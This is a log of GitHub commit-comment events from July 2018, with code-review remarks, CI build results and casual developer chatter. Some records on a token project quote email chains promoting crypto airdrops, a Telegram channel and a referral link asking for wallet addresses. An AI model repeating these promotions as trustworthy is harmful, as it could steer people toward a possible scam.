{"id":"8019761049","type":"CommitCommentEvent","actor":{"login":"AShalysh"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29837521,"position":24,"line":24,"path":"lesson8/accessors.rb","commit_id":"0cabccb1066ef868ddd31f73dbb4fb3184164785","created_at":"2018-07-26T00:38:21Z","updated_at":"2018-07-26T00:38:21Z","author_association":"OWNER","body":"Максим, спасибо за комментарии) Да, ведать я его не полностью проверила)) я внесла исправления и отправила ссылку через Тичбейз)"}},"created_at":"2018-07-26T00:38:21Z"}
{"id":"8019761112","type":"CommitCommentEvent","actor":{"login":"mkllnk"},"repo":{"name":"openfoodfoundation/openfoodnetwork"},"payload":{"comment":{"id":29837522,"position":4,"line":25,"path":"config/initializers/spree.rb","commit_id":"a0d2ec5666a97198ccfb3534e0d33d29f8ea6142","created_at":"2018-07-26T00:38:22Z","updated_at":"2018-07-26T00:38:22Z","author_association":"MEMBER","body":"Ah. :-) Does this make everything work now?"}},"created_at":"2018-07-26T00:38:22Z"}
{"id":"8019764707","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29837532,"position":18,"line":22,"path":"src/program/Battle.java","commit_id":"2cc7564b6259f41045c06f13cc50822800788381","created_at":"2018-07-26T00:39:52Z","updated_at":"2018-07-26T00:39:52Z","author_association":"CONTRIBUTOR","body":"Nah, `Renderer `has lines that are _much_ longer than this lil' scrub."}},"created_at":"2018-07-26T00:39:52Z"}
{"id":"8019766424","type":"CommitCommentEvent","actor":{"login":"dtws1135"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29837536,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T00:40:35Z","updated_at":"2018-07-26T00:40:35Z","author_association":"NONE","body":"\n\nhttps://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610 commitcomment - 29828033 \n发自网易邮箱大师\nOn 7/25/2018 20:18，sirathashimi<notifications@github.com> wrote：\nJoin my telegram https://t.me/highpayoutairdrops for more high payout\nairdrop alerts!!\n\nOn Wednesday, July 25, 2018, Sirat Hashimi <siraty69@gmail.com> wrote:\n\n> Avinoc Network Operation Chain. A legitimate, transparent project with a\n> working use case, road map, and whitepaper. ICO Rating: 4.1/5. Click the\n> link, sign up, submit your ERC-20 wallet address and start receiving Avinoc\n> worth $300+. Airdrop ends in 7 days! 🔥 https://www.avinoc.com/r/\n> Xa4hvUactw9o💰\n>\n> On Wednesday, July 25, 2018, Duke7467 <notifications@github.com> wrote:\n>\n>> it is good proj.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29828033>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/Am4jXYjZKhssGHWe7g3EUNSmq4xKv7NIks5uKGAygaJpZM4VaEAl>\n>> .\n>>\n>\n\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-26T00:40:35Z"}
{"id":"8019770814","type":"CommitCommentEvent","actor":{"login":"JohnMcGuinness"},"repo":{"name":"marksreeves/wcomponents"},"payload":{"comment":{"id":29837550,"position":88,"line":88,"path":"wcomponents-core/src/main/java/com/github/bordertech/wcomponents/render/helper/MarginRenderHelper.java","commit_id":"8a877a49fa73e91cccd4f2933af92c10c29661d2","created_at":"2018-07-26T00:42:22Z","updated_at":"2018-07-26T00:42:22Z","author_association":"NONE","body":"Using Java 8 style htmlClasses.stream().collect(Collectors.joining(\" \"));"}},"created_at":"2018-07-26T00:42:22Z"}
{"id":"8019772243","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29837553,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T00:42:53Z","updated_at":"2018-07-26T00:42:53Z","author_association":"NONE","body":"https://github.com/ezio84/abc_packages_apps_Dialer/commit/d6a0f0fe1818003759dae650bdc1080faa216945"}},"created_at":"2018-07-26T00:42:53Z"}
{"id":"8019773331","type":"CommitCommentEvent","actor":{"login":"dtws1135"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29837555,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T00:43:18Z","updated_at":"2018-07-26T00:43:18Z","author_association":"NONE","body":"\n\n\n\n发自网易邮箱大师https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610 commitcomment - 29824207\nOn 7/25/2018 14:24，chaos0972<notifications@github.com> wrote：\nDo not email me now\n\n2018년 7월 25일 (수) 오후 3:14, Tuanvnsa <notifications@github.com>님이 작성:\n\n> Hiii, Project very good!\n>\n> 2018-07-25 12:48 GMT+07:00 Roman Sazonov <notifications@github.com>:\n>\n> > Great project\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29824207\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AnMJ1_taUSHtG_Y6RubFZYPMPb9ICGWIks5uKAaqgaJpZM4VaEAl\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29824372>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Aik-vWK7OnO8qEuYNpiShin7Q3OyWEqgks5uKAy1gaJpZM4VaEAl>\n> .\n>\n\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-26T00:43:18Z"}
{"id":"8019773473","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29837556,"position":null,"line":null,"path":null,"commit_id":"523450d3c2a924c51963494cd7b55f3114d1b058","created_at":"2018-07-26T00:43:22Z","updated_at":"2018-07-26T00:43:22Z","author_association":"OWNER","body":"LTC to remove HinderPassedPawn altogether.\r\n\r\nhttp://tests.stockfishchess.org/tests/view/5b5913b80ebc5902bdb897cd"}},"created_at":"2018-07-26T00:43:22Z"}
{"id":"8019774251","type":"CommitCommentEvent","actor":{"login":"dtws1135"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29837558,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T00:43:41Z","updated_at":"2018-07-26T00:43:41Z","author_association":"NONE","body":"https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610 commitcomment - 29824207 \n\n\n发自网易邮箱大师\nOn 7/25/2018 14:14，Tuanvnsa<notifications@github.com> wrote：\nHiii, Project very good!\n\n2018-07-25 12:48 GMT+07:00 Roman Sazonov <notifications@github.com>:\n\n> Great project\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29824207>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnMJ1_taUSHtG_Y6RubFZYPMPb9ICGWIks5uKAaqgaJpZM4VaEAl>\n> .\n>\n\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-26T00:43:41Z"}
{"id":"8019774309","type":"CommitCommentEvent","actor":{"login":"woodyinho"},"repo":{"name":"sonaskyla12/users"},"payload":{"comment":{"id":29837559,"position":null,"line":null,"path":null,"commit_id":"d343d7b732272886652615c49b22582ef9197adb","created_at":"2018-07-26T00:43:42Z","updated_at":"2018-07-26T00:43:42Z","author_association":"NONE","body":"Are you studying node js from coursera ??"}},"created_at":"2018-07-26T00:43:42Z"}
{"id":"8019774522","type":"CommitCommentEvent","actor":{"login":"LucasBassetti"},"repo":{"name":"LucasBassetti/react-simple-chatbot"},"payload":{"comment":{"id":29837560,"position":4,"line":7,"path":"webpack.config.prod.js","commit_id":"78554d122578bda583ccd565716b2cad3cb0d872","created_at":"2018-07-26T00:43:48Z","updated_at":"2018-07-26T00:43:48Z","author_association":"OWNER","body":"Hey, \r\n\r\nHonestly not sure if this is the best way. But I liked the idea because it reduce the bundle size of the chatbot."}},"created_at":"2018-07-26T00:43:48Z"}
{"id":"8019775681","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29837562,"position":null,"line":null,"path":null,"commit_id":"de6a5b2d244dc8626739c629038c663b1ff3b0ad","created_at":"2018-07-26T00:44:17Z","updated_at":"2018-07-26T00:44:17Z","author_association":"COLLABORATOR","body":"- New RPC command: `VALIDATE_APPLICATION`"}},"created_at":"2018-07-26T00:44:17Z"}
{"id":"8019779917","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29837574,"position":null,"line":null,"path":null,"commit_id":"ac6ec315271f88b90e8a788b5851bb1fcd4489f2","created_at":"2018-07-26T00:46:01Z","updated_at":"2018-07-26T00:46:01Z","author_association":"MEMBER","body":"@cjchapman should we make travis fail as soon as it gets a flake8 or cpplint error?\r\nhttps://docs.travis-ci.com/user/customizing-the-build/#breaking-the-build"}},"created_at":"2018-07-26T00:46:01Z"}
{"id":"8019786325","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29837590,"position":null,"line":null,"path":null,"commit_id":"0747cadf421a3f6e7d2db57bce86dea2e08c8abc","created_at":"2018-07-26T00:48:26Z","updated_at":"2018-07-26T00:48:26Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.250`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/250) :tada:"}},"created_at":"2018-07-26T00:48:26Z"}
{"id":"8019786664","type":"CommitCommentEvent","actor":{"login":"param135"},"repo":{"name":"param135/tower"},"payload":{"comment":{"id":29837591,"position":null,"line":null,"path":null,"commit_id":"e62397f429cbd088e1de696f0ab5bb5a919b718c","created_at":"2018-07-26T00:48:34Z","updated_at":"2018-07-26T00:48:34Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-26T00:48:34Z"}
{"id":"8019790715","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837595,"position":null,"line":null,"path":null,"commit_id":"c94051a32260f43d5f70d87d514440a803bfd2b9","created_at":"2018-07-26T00:50:07Z","updated_at":"2018-07-26T00:50:07Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c94051a32260f43d5f70d87d514440a803bfd2b9-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c94051a32260f43d5f70d87d514440a803bfd2b9-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T00:50:07Z"}
{"id":"8019791093","type":"CommitCommentEvent","actor":{"login":"mdepaly"},"repo":{"name":"uk-hsm/exercise"},"payload":{"comment":{"id":29837597,"position":null,"line":null,"path":null,"commit_id":"bf81db7c1d9c71ef3af40c78c92e6bde4ef24737","created_at":"2018-07-26T00:50:15Z","updated_at":"2018-07-26T00:50:15Z","author_association":"NONE","body":"Bitte lassen Sie sich von den Hinweisen nicht erschrecken. Im Gegenteil, für die ersten Schritte mit JavaScript ist Ihre Implementierung beeindruckend gut. "}},"created_at":"2018-07-26T00:50:15Z"}
{"id":"8019792430","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29837601,"position":null,"line":null,"path":null,"commit_id":"0747cadf421a3f6e7d2db57bce86dea2e08c8abc","created_at":"2018-07-26T00:50:45Z","updated_at":"2018-07-26T00:50:45Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.378`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/408308335) :tada:"}},"created_at":"2018-07-26T00:50:45Z"}
{"id":"8019799983","type":"CommitCommentEvent","actor":{"login":"mtunc000"},"repo":{"name":"mtunc000/bootcamp-first-repository"},"payload":{"comment":{"id":29837618,"position":null,"line":null,"path":null,"commit_id":"e6d7c1356588b33ab3d3317e602c6f94fccb6b86","created_at":"2018-07-26T00:53:40Z","updated_at":"2018-07-26T00:53:40Z","author_association":"OWNER","body":"again me"}},"created_at":"2018-07-26T00:53:40Z"}
{"id":"8019808434","type":"CommitCommentEvent","actor":{"login":"StefanYohansson"},"repo":{"name":"qiangmao/axios"},"payload":{"comment":{"id":29837623,"position":5,"line":43,"path":"lib/core/dispatchRequest.js","commit_id":"c384447ec8701c72ca53739bb1f35c686e157541","created_at":"2018-07-26T00:57:04Z","updated_at":"2018-07-26T00:57:04Z","author_association":"NONE","body":"undefined?"}},"created_at":"2018-07-26T00:57:04Z"}
{"id":"8019810502","type":"CommitCommentEvent","actor":{"login":"klmader"},"repo":{"name":"isaacbg8/ninjoin"},"payload":{"comment":{"id":29837630,"position":null,"line":null,"path":null,"commit_id":"107fbd49011c274907dbc224f11f0254fdf88c76","created_at":"2018-07-26T00:57:53Z","updated_at":"2018-07-26T00:57:53Z","author_association":"COLLABORATOR","body":"sounds good"}},"created_at":"2018-07-26T00:57:53Z"}
{"id":"8019813406","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29837635,"position":null,"line":null,"path":null,"commit_id":"3cc40fed2ee516cf695fbb4341343456ea77d17c","created_at":"2018-07-26T00:58:58Z","updated_at":"2018-07-26T00:58:58Z","author_association":"MEMBER","body":"#1145"}},"created_at":"2018-07-26T00:58:58Z"}
{"id":"8019816928","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29837646,"position":null,"line":null,"path":null,"commit_id":"7219c2c8588815ed66732a337c952a8d0a65d21d","created_at":"2018-07-26T01:00:18Z","updated_at":"2018-07-26T01:00:18Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-954](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-954).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-954-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T01:00:18Z"}
{"id":"8019821918","type":"CommitCommentEvent","actor":{"login":"ptpt52"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29837659,"position":null,"line":null,"path":null,"commit_id":"3d456a50f47f4b48e294b0e4ca3df836729bf39c","created_at":"2018-07-26T01:02:13Z","updated_at":"2018-07-26T01:02:13Z","author_association":"CONTRIBUTOR","body":"bug?\r\ncpu cannot bring up\r\n\r\n[    0.000971] CPU: Testing write buffer coherency: ok\r\n[    0.001559] Setting up static identity map for 0x80300000 - 0x80300060\r\n[    0.001682] Hierarchical SRCU implementation.\r\n[    0.002246] smp: Bringing up secondary CPUs ...\r\n[    0.002624] CPU1: failed to boot: -19\r\n[    0.003017] CPU2: failed to boot: -19\r\n[    0.003423] CPU3: failed to boot: -19\r\n[    0.003459] smp: Brought up 1 node, 1 CPU\r\n[    0.003469] SMP: Total of 1 processors activated (96.00 BogoMIPS).\r\n[    0.003477] CPU: All CPU(s) started in SVC mode.\r\n"}},"created_at":"2018-07-26T01:02:13Z"}
{"id":"8019824230","type":"CommitCommentEvent","actor":{"login":"Xander479"},"repo":{"name":"Xander479/PractiseRom"},"payload":{"comment":{"id":29837665,"position":null,"line":null,"path":null,"commit_id":"c8a399527329cb54373f1904061ed2dc69dd8367","created_at":"2018-07-26T01:03:08Z","updated_at":"2018-07-26T01:03:08Z","author_association":"OWNER","body":"That's not how you spell 'description'"}},"created_at":"2018-07-26T01:03:08Z"}
{"id":"8019830417","type":"CommitCommentEvent","actor":{"login":"DavePearce"},"repo":{"name":"guns/golibs"},"payload":{"comment":{"id":29837677,"position":null,"line":null,"path":null,"commit_id":"8a8577ce6c8dcdcf5778f59f841ed6db1ae1d857","created_at":"2018-07-26T01:05:32Z","updated_at":"2018-07-26T01:05:32Z","author_association":"NONE","body":"Hey @guns, glad you like it and very cool to see a Go implementation as well!!"}},"created_at":"2018-07-26T01:05:32Z"}
{"id":"8019830739","type":"CommitCommentEvent","actor":{"login":"LIULi-VVET"},"repo":{"name":"actions-on-google/smart-home-dashboard"},"payload":{"comment":{"id":29837680,"position":null,"line":null,"path":null,"commit_id":"c7d84ebef38ca977b9f134ceea7c0279f8d04e9e","created_at":"2018-07-26T01:05:40Z","updated_at":"2018-07-26T01:05:40Z","author_association":"NONE","body":"Ok! Thank you!"}},"created_at":"2018-07-26T01:05:40Z"}
{"id":"8019831294","type":"CommitCommentEvent","actor":{"login":"larsoner"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":29837681,"position":33,"line":1760,"path":"mne/viz/_3d.py","commit_id":"c4fca6beebdfd1fda722755eeb40b8c16b3ec0f0","created_at":"2018-07-26T01:05:51Z","updated_at":"2018-07-26T01:05:51Z","author_association":"MEMBER","body":"You should `import scipy.stats`. SciPy submodules are not imported by default, so if this currently works, it suggests you are perhaps just getting lucky that some other function has already imported scipy.stats before you go to use it"}},"created_at":"2018-07-26T01:05:51Z"}
{"id":"8019836631","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837690,"position":null,"line":null,"path":null,"commit_id":"02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c","created_at":"2018-07-26T01:07:51Z","updated_at":"2018-07-26T01:07:51Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (mjwitte) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2945 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.03%25-red.png)</a> \n"}},"created_at":"2018-07-26T01:07:51Z"}
{"id":"8019844930","type":"CommitCommentEvent","actor":{"login":"danielhollas"},"repo":{"name":"KhanovaSkola/discourse-linkify-words"},"payload":{"comment":{"id":29837701,"position":null,"line":null,"path":null,"commit_id":"9578aad035e58ebd07c602016079998a8e1468f8","created_at":"2018-07-26T01:11:03Z","updated_at":"2018-07-26T01:11:03Z","author_association":"MEMBER","body":"Hi there @SamSaffron. \r\n\r\nJust a thought, would it make sense to include parentheses as delimiters? So that `(word)` is matched as well? \r\n\r\nbtw: this theme is awesome, thank you! I just made a modification that autolinks JIRA tickets, super-helpful for us.\r\n"}},"created_at":"2018-07-26T01:11:03Z"}
{"id":"8019849990","type":"CommitCommentEvent","actor":{"login":"satanas"},"repo":{"name":"satanas/k3j"},"payload":{"comment":{"id":29837716,"position":18,"line":23,"path":"core/k3j.js","commit_id":"bb4bdcf56e795a14f92f031bee3cd493c3c9c738","created_at":"2018-07-26T01:12:54Z","updated_at":"2018-07-26T01:12:54Z","author_association":"OWNER","body":"Instead of `window`, this should be `global`, right? And we don't need `window.document` since we have `document` as parameter too."}},"created_at":"2018-07-26T01:12:54Z"}
{"id":"8019850966","type":"CommitCommentEvent","actor":{"login":"dcci"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29837717,"position":63,"line":345,"path":"include/swift/Remote/MetadataReader.h","commit_id":"fd0f5f1364ca8c53d78fa744090df4a453eac7ac","created_at":"2018-07-26T01:13:17Z","updated_at":"2018-07-26T01:13:17Z","author_association":"MEMBER","body":"Note: I think this computation, which I took directly from `projectExistential` might be wrong.\r\nI'd expect we don't add up the alignment in case `InstanceAddress % Alignment == 0`, and we perform that very computation otherwise."}},"created_at":"2018-07-26T01:13:17Z"}
{"id":"8019855134","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837720,"position":null,"line":null,"path":null,"commit_id":"f2973055f4db295609d7d4ae36d61229efb18057","created_at":"2018-07-26T01:14:54Z","updated_at":"2018-07-26T01:14:54Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2325 of 2326 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 652\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-26T01:14:54Z"}
{"id":"8019855208","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29837721,"position":null,"line":null,"path":null,"commit_id":"f354740abc3c6445c6f0ed8d62f10f3fc84386a3","created_at":"2018-07-26T01:14:56Z","updated_at":"2018-07-26T01:14:56Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-26T01:14:56Z"}
{"id":"8019858661","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29837729,"position":null,"line":null,"path":null,"commit_id":"a45ec3c750d72408b35d35cfabe30e962e65b4c5","created_at":"2018-07-26T01:16:14Z","updated_at":"2018-07-26T01:16:14Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-26T01:16:14Z"}
{"id":"8019858831","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837730,"position":null,"line":null,"path":null,"commit_id":"f2973055f4db295609d7d4ae36d61229efb18057","created_at":"2018-07-26T01:16:17Z","updated_at":"2018-07-26T01:16:17Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T01:16:17Z"}
{"id":"8019863046","type":"CommitCommentEvent","actor":{"login":"SamSaffron"},"repo":{"name":"KhanovaSkola/discourse-linkify-words"},"payload":{"comment":{"id":29837735,"position":null,"line":null,"path":null,"commit_id":"9578aad035e58ebd07c602016079998a8e1468f8","created_at":"2018-07-26T01:17:54Z","updated_at":"2018-07-26T01:17:54Z","author_association":"NONE","body":"probably makes sense, can you post on meta I want to make sure consumers of\nthe component will not get confused if we add that.\n\nOn Thu, Jul 26, 2018 at 11:11 AM, Daniel Hollas <notifications@github.com>\nwrote:\n\n> Hi there @SamSaffron <https://github.com/SamSaffron>.\n>\n> Just a thought, would it make sense to include parentheses as delimiters?\n> So that (word) is matched as well?\n>\n> btw: this theme is awesome, thank you! I just made a modification that\n> autolinks JIRA tickets, super-helpful for us.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/KhanovaSkola/discourse-linkify-words/commit/9578aad035e58ebd07c602016079998a8e1468f8#commitcomment-29837701>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAUXSU4DYsdzlppjBnApgHtcGXykSZNks5uKRcngaJpZM4VhBdY>\n> .\n>\n"}},"created_at":"2018-07-26T01:17:54Z"}
{"id":"8019868252","type":"CommitCommentEvent","actor":{"login":"bartimaeusnek"},"repo":{"name":"PC-Logix/OpenFM"},"payload":{"comment":{"id":29837749,"position":13,"line":73,"path":"src/main/java/pcl/OpenFM/OpenFM.java","commit_id":"3b63ce0212479a5c2802202e844a66bbaee68024","created_at":"2018-07-26T01:20:01Z","updated_at":"2018-07-26T01:20:01Z","author_association":"NONE","body":"This crashes with a NPE if the CC-API isnt installed. @CaitlynMainer "}},"created_at":"2018-07-26T01:20:01Z"}
{"id":"8019871704","type":"CommitCommentEvent","actor":{"login":"bartimaeusnek"},"repo":{"name":"PC-Logix/OpenFM"},"payload":{"comment":{"id":29837752,"position":null,"line":null,"path":null,"commit_id":"3b63ce0212479a5c2802202e844a66bbaee68024","created_at":"2018-07-26T01:21:21Z","updated_at":"2018-07-26T01:21:21Z","author_association":"NONE","body":"This crashes with a NPE (java.lang.NoClassDefFoundError) if the CC-API isnt installed."}},"created_at":"2018-07-26T01:21:21Z"}
{"id":"8019873405","type":"CommitCommentEvent","actor":{"login":"tmd121317"},"repo":{"name":"tmd121317/guacamole"},"payload":{"comment":{"id":29837757,"position":null,"line":null,"path":null,"commit_id":"6b4db54a5b5a3716c226c5e511b4edb61e22ac6c","created_at":"2018-07-26T01:21:57Z","updated_at":"2018-07-26T01:21:57Z","author_association":"OWNER","body":"what if I do have leftover?  "}},"created_at":"2018-07-26T01:21:57Z"}
{"id":"8019875961","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837760,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-26T01:23:00Z","updated_at":"2018-07-26T01:23:00Z","author_association":"NONE","body":"159313706_Issue#6796 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T01:23:00Z"}
{"id":"8019878490","type":"CommitCommentEvent","actor":{"login":"tmd121317"},"repo":{"name":"ajt986/guacamole"},"payload":{"comment":{"id":29837765,"position":null,"line":null,"path":null,"commit_id":"1bf6231c633c6ccb5fa780e9224bb7b6d792cc7e","created_at":"2018-07-26T01:24:03Z","updated_at":"2018-07-26T01:24:03Z","author_association":"COLLABORATOR","body":"what is the difference of \"fried onion\" and \"chopped fried onion\"?"}},"created_at":"2018-07-26T01:24:03Z"}
{"id":"8019892873","type":"CommitCommentEvent","actor":{"login":"ReKTDevlol"},"repo":{"name":"ReKTDevlol/NekoBot"},"payload":{"comment":{"id":29837789,"position":null,"line":null,"path":null,"commit_id":"432f96bc4429dc92d041ddb46bd48fb174f6aa6f","created_at":"2018-07-26T01:29:39Z","updated_at":"2018-07-26T01:29:39Z","author_association":"OWNER","body":"bearcop"}},"created_at":"2018-07-26T01:29:39Z"}
{"id":"8019896517","type":"CommitCommentEvent","actor":{"login":"CFTheMaster"},"repo":{"name":"ReKTDevlol/NekoBot"},"payload":{"comment":{"id":29837797,"position":null,"line":null,"path":null,"commit_id":"432f96bc4429dc92d041ddb46bd48fb174f6aa6f","created_at":"2018-07-26T01:31:03Z","updated_at":"2018-07-26T01:31:03Z","author_association":"COLLABORATOR","body":"rewrite into what language or still sticking with Py"}},"created_at":"2018-07-26T01:31:03Z"}
